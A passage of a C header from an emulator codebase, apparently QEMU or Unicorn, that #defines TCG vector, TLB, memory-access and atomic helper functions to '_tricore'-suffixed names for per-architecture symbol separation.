tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_tricore #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_tricore #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_tricore #define tcg_gen_gvec_sub tcg_gen_gvec_sub_tricore #define tcg_gen_gvec_mul tcg_gen_gvec_mul_tricore #define tcg_gen_gvec_muls tcg_gen_gvec_muls_tricore #define tcg_gen_gvec_muli tcg_gen_gvec_muli_tricore #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_tricore #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_tricore #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_tricore #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_tricore #define tcg_gen_gvec_smin tcg_gen_gvec_smin_tricore #define tcg_gen_gvec_umin tcg_gen_gvec_umin_tricore #define tcg_gen_gvec_smax tcg_gen_gvec_smax_tricore #define tcg_gen_gvec_umax tcg_gen_gvec_umax_tricore #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_tricore #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_tricore #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_tricore #define tcg_gen_gvec_neg tcg_gen_gvec_neg_tricore #define tcg_gen_gvec_abs tcg_gen_gvec_abs_tricore #define tcg_gen_gvec_and tcg_gen_gvec_and_tricore #define tcg_gen_gvec_or tcg_gen_gvec_or_tricore #define tcg_gen_gvec_xor tcg_gen_gvec_xor_tricore #define tcg_gen_gvec_andc tcg_gen_gvec_andc_tricore #define tcg_gen_gvec_orc tcg_gen_gvec_orc_tricore #define tcg_gen_gvec_nand tcg_gen_gvec_nand_tricore #define tcg_gen_gvec_nor tcg_gen_gvec_nor_tricore #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_tricore #define tcg_gen_gvec_ands tcg_gen_gvec_ands_tricore #define tcg_gen_gvec_andi tcg_gen_gvec_andi_tricore #define tcg_gen_gvec_xors tcg_gen_gvec_xors_tricore #define tcg_gen_gvec_xori tcg_gen_gvec_xori_tricore #define tcg_gen_gvec_ors tcg_gen_gvec_ors_tricore #define tcg_gen_gvec_ori tcg_gen_gvec_ori_tricore #define 
tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_tricore #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_tricore #define tcg_gen_gvec_shli tcg_gen_gvec_shli_tricore #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_tricore #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_tricore #define tcg_gen_gvec_shri tcg_gen_gvec_shri_tricore #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_tricore #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_tricore #define tcg_gen_gvec_sari tcg_gen_gvec_sari_tricore #define tcg_gen_gvec_shls tcg_gen_gvec_shls_tricore #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_tricore #define tcg_gen_gvec_sars tcg_gen_gvec_sars_tricore #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_tricore #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_tricore #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_tricore #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_tricore #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_tricore #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_tricore #define vec_gen_2 vec_gen_2_tricore #define vec_gen_3 vec_gen_3_tricore #define vec_gen_4 vec_gen_4_tricore #define tcg_gen_mov_vec tcg_gen_mov_vec_tricore #define tcg_const_zeros_vec tcg_const_zeros_vec_tricore #define tcg_const_ones_vec tcg_const_ones_vec_tricore #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_tricore #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_tricore #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_tricore #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_tricore #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_tricore #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_tricore #define tcg_gen_dupi_vec tcg_gen_dupi_vec_tricore #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_tricore #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_tricore #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_tricore #define tcg_gen_ld_vec tcg_gen_ld_vec_tricore #define tcg_gen_st_vec tcg_gen_st_vec_tricore #define tcg_gen_stl_vec tcg_gen_stl_vec_tricore #define tcg_gen_and_vec tcg_gen_and_vec_tricore #define tcg_gen_or_vec tcg_gen_or_vec_tricore #define tcg_gen_xor_vec tcg_gen_xor_vec_tricore #define tcg_gen_andc_vec tcg_gen_andc_vec_tricore #define tcg_gen_orc_vec tcg_gen_orc_vec_tricore #define tcg_gen_nand_vec tcg_gen_nand_vec_tricore #define tcg_gen_nor_vec tcg_gen_nor_vec_tricore #define tcg_gen_eqv_vec tcg_gen_eqv_vec_tricore #define tcg_gen_not_vec tcg_gen_not_vec_tricore #define tcg_gen_neg_vec tcg_gen_neg_vec_tricore #define tcg_gen_abs_vec tcg_gen_abs_vec_tricore #define tcg_gen_shli_vec tcg_gen_shli_vec_tricore #define tcg_gen_shri_vec tcg_gen_shri_vec_tricore #define tcg_gen_sari_vec tcg_gen_sari_vec_tricore #define tcg_gen_cmp_vec tcg_gen_cmp_vec_tricore #define tcg_gen_add_vec tcg_gen_add_vec_tricore #define tcg_gen_sub_vec tcg_gen_sub_vec_tricore #define tcg_gen_mul_vec tcg_gen_mul_vec_tricore #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_tricore #define tcg_gen_usadd_vec tcg_gen_usadd_vec_tricore #define tcg_gen_sssub_vec tcg_gen_sssub_vec_tricore #define tcg_gen_ussub_vec tcg_gen_ussub_vec_tricore #define tcg_gen_smin_vec tcg_gen_smin_vec_tricore #define tcg_gen_umin_vec tcg_gen_umin_vec_tricore #define tcg_gen_smax_vec tcg_gen_smax_vec_tricore #define tcg_gen_umax_vec tcg_gen_umax_vec_tricore #define tcg_gen_shlv_vec tcg_gen_shlv_vec_tricore #define tcg_gen_shrv_vec tcg_gen_shrv_vec_tricore #define tcg_gen_sarv_vec tcg_gen_sarv_vec_tricore #define tcg_gen_shls_vec tcg_gen_shls_vec_tricore #define tcg_gen_shrs_vec tcg_gen_shrs_vec_tricore #define tcg_gen_sars_vec 
tcg_gen_sars_vec_tricore #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_tricore #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_tricore #define tb_htable_lookup tb_htable_lookup_tricore #define tb_set_jmp_target tb_set_jmp_target_tricore #define cpu_exec cpu_exec_tricore #define cpu_loop_exit_noexc cpu_loop_exit_noexc_tricore #define cpu_reloading_memory_map cpu_reloading_memory_map_tricore #define cpu_loop_exit cpu_loop_exit_tricore #define cpu_loop_exit_restore cpu_loop_exit_restore_tricore #define cpu_loop_exit_atomic cpu_loop_exit_atomic_tricore #define tlb_init tlb_init_tricore #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_tricore #define tlb_flush tlb_flush_tricore #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_tricore #define tlb_flush_all_cpus tlb_flush_all_cpus_tricore #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_tricore #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_tricore #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_tricore #define tlb_flush_page tlb_flush_page_tricore #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_tricore #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_tricore #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_tricore #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_tricore #define tlb_protect_code tlb_protect_code_tricore #define tlb_unprotect_code tlb_unprotect_code_tricore #define tlb_reset_dirty tlb_reset_dirty_tricore #define tlb_set_dirty tlb_set_dirty_tricore #define tlb_set_page_with_attrs tlb_set_page_with_attrs_tricore #define tlb_set_page tlb_set_page_tricore #define get_page_addr_code_hostp get_page_addr_code_hostp_tricore #define get_page_addr_code get_page_addr_code_tricore #define probe_access probe_access_tricore #define tlb_vaddr_to_host tlb_vaddr_to_host_tricore #define helper_ret_ldub_mmu helper_ret_ldub_mmu_tricore #define helper_le_lduw_mmu helper_le_lduw_mmu_tricore #define helper_be_lduw_mmu helper_be_lduw_mmu_tricore #define helper_le_ldul_mmu helper_le_ldul_mmu_tricore #define helper_be_ldul_mmu helper_be_ldul_mmu_tricore #define helper_le_ldq_mmu helper_le_ldq_mmu_tricore #define helper_be_ldq_mmu helper_be_ldq_mmu_tricore #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_tricore #define helper_le_ldsw_mmu helper_le_ldsw_mmu_tricore #define helper_be_ldsw_mmu helper_be_ldsw_mmu_tricore #define helper_le_ldsl_mmu helper_le_ldsl_mmu_tricore #define helper_be_ldsl_mmu helper_be_ldsl_mmu_tricore #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_tricore #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_tricore #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_tricore #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_tricore #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_tricore #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_tricore #define cpu_ldub_data_ra cpu_ldub_data_ra_tricore #define cpu_ldsb_data_ra cpu_ldsb_data_ra_tricore #define cpu_lduw_data_ra cpu_lduw_data_ra_tricore #define cpu_ldsw_data_ra cpu_ldsw_data_ra_tricore #define cpu_ldl_data_ra cpu_ldl_data_ra_tricore #define cpu_ldq_data_ra cpu_ldq_data_ra_tricore #define cpu_ldub_data cpu_ldub_data_tricore #define cpu_ldsb_data cpu_ldsb_data_tricore #define cpu_lduw_data cpu_lduw_data_tricore #define cpu_ldsw_data cpu_ldsw_data_tricore #define cpu_ldl_data cpu_ldl_data_tricore #define cpu_ldq_data cpu_ldq_data_tricore #define helper_ret_stb_mmu helper_ret_stb_mmu_tricore #define helper_le_stw_mmu helper_le_stw_mmu_tricore #define 
helper_be_stw_mmu helper_be_stw_mmu_tricore #define helper_le_stl_mmu helper_le_stl_mmu_tricore #define helper_be_stl_mmu helper_be_stl_mmu_tricore #define helper_le_stq_mmu helper_le_stq_mmu_tricore #define helper_be_stq_mmu helper_be_stq_mmu_tricore #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_tricore #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_tricore #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_tricore #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_tricore #define cpu_stb_data_ra cpu_stb_data_ra_tricore #define cpu_stw_data_ra cpu_stw_data_ra_tricore #define cpu_stl_data_ra cpu_stl_data_ra_tricore #define cpu_stq_data_ra cpu_stq_data_ra_tricore #define cpu_stb_data cpu_stb_data_tricore #define cpu_stw_data cpu_stw_data_tricore #define cpu_stl_data cpu_stl_data_tricore #define cpu_stq_data cpu_stq_data_tricore #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_tricore #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_tricore #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_tricore #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_tricore #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_tricore #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_tricore #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_tricore #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_tricore #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_tricore #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_tricore #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_tricore #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_tricore #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_tricore #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_tricore #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_tricore #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_tricore #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_tricore #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_tricore #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_tricore #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_tricore #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_tricore #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_tricore #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_tricore #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_tricore #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_tricore #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_tricore #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_tricore #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_tricore #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_tricore #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_tricore #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_tricore #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_tricore #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_tricore #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_tricore #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_tricore #define helper_atomic_umax_fetchw_le_mmu 
helper_atomic_umax_fetchw_le_mmu_tricore #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_tricore #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_tricore #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_tricore #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_tricore #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_tricore #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_tricore #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_tricore #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_tricore #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_tricore #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_tricore #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_tricore #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_tricore #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_tricore #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_tricore #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_tricore #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_tricore #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_tricore #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_tricore #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_tricore #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_tricore #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_tricore #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_tricore #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_tricore #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_tricore #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_tricore #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_tricore #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_tricore #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_tricore #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_tricore #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_tricore #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_tricore #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_tricore #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_tricore #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_tricore #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_tricore #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_tricore #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_tricore #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_tricore #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_tricore #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_tricore #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_tricore #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_tricore #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_tricore #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_tricore #define 
helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_tricore #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_tricore #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_tricore #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_tricore #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_tricore #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_tricore #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_tricore #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_tricore #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_tricore #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_tricore #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_tricore #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_tricore #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_tricore #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_tricore #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_tricore #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_tricore #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_tricore #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_tricore #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_tricore #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_tricore #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_tricore #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_tricore #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_tricore #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_tricore #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_tricore #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_tricore #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_tricore #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_tricore #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_tricore #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_tricore #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_tricore #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_tricore #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_tricore #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_tricore #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_tricore #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_tricore #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_tricore #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_tricore #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_tricore #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_tricore #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_tricore #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_tricore #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_tricore #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_tricore #define 
helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_tricore #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_tricore #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_tricore #define helper_atomic_xchgb helper_atomic_xchgb_tricore #define helper_atomic_fetch_addb helper_atomic_fetch_addb_tricore #define helper_atomic_fetch_andb helper_atomic_fetch_andb_tricore #define helper_atomic_fetch_orb helper_atomic_fetch_orb_tricore #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_tricore #define helper_atomic_add_fetchb helper_atomic_add_fetchb_tricore #define helper_atomic_and_fetchb helper_atomic_and_fetchb_tricore #define helper_atomic_or_fetchb helper_atomic_or_fetchb_tricore #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_tricore #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_tricore #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_tricore #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_tricore #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_tricore #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_tricore #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_tricore #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_tricore #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_tricore #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_tricore #define helper_atomic_xchgw_le helper_atomic_xchgw_le_tricore #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_tricore #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_tricore #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_tricore #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_tricore #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_tricore #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_tricore #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_tricore #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_tricore #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_tricore #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_tricore #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_tricore #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_tricore #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_tricore #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_tricore #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_tricore #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_tricore #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_tricore #define helper_atomic_xchgw_be helper_atomic_xchgw_be_tricore #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_tricore #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_tricore #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_tricore #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_tricore #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_tricore #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_tricore #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_tricore #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_tricore #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_tricore #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_tricore #define helper_atomic_smin_fetchw_be 
helper_atomic_smin_fetchw_be_tricore #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_tricore #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_tricore #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_tricore #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_tricore #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_tricore #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_tricore #define helper_atomic_xchgl_le helper_atomic_xchgl_le_tricore #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_tricore #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_tricore #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_tricore #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_tricore #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_tricore #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_tricore #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_tricore #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_tricore #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_tricore #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_tricore #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_tricore #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_tricore #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_tricore #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_tricore #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_tricore #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_tricore #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_tricore #define helper_atomic_xchgl_be helper_atomic_xchgl_be_tricore #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_tricore #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_tricore #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_tricore #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_tricore #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_tricore #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_tricore #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_tricore #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_tricore #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_tricore #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_tricore #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_tricore #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_tricore #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_tricore #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_tricore #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_tricore #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_tricore #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_tricore #define helper_atomic_xchgq_le helper_atomic_xchgq_le_tricore #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_tricore #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_tricore #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_tricore #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_tricore #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_tricore #define 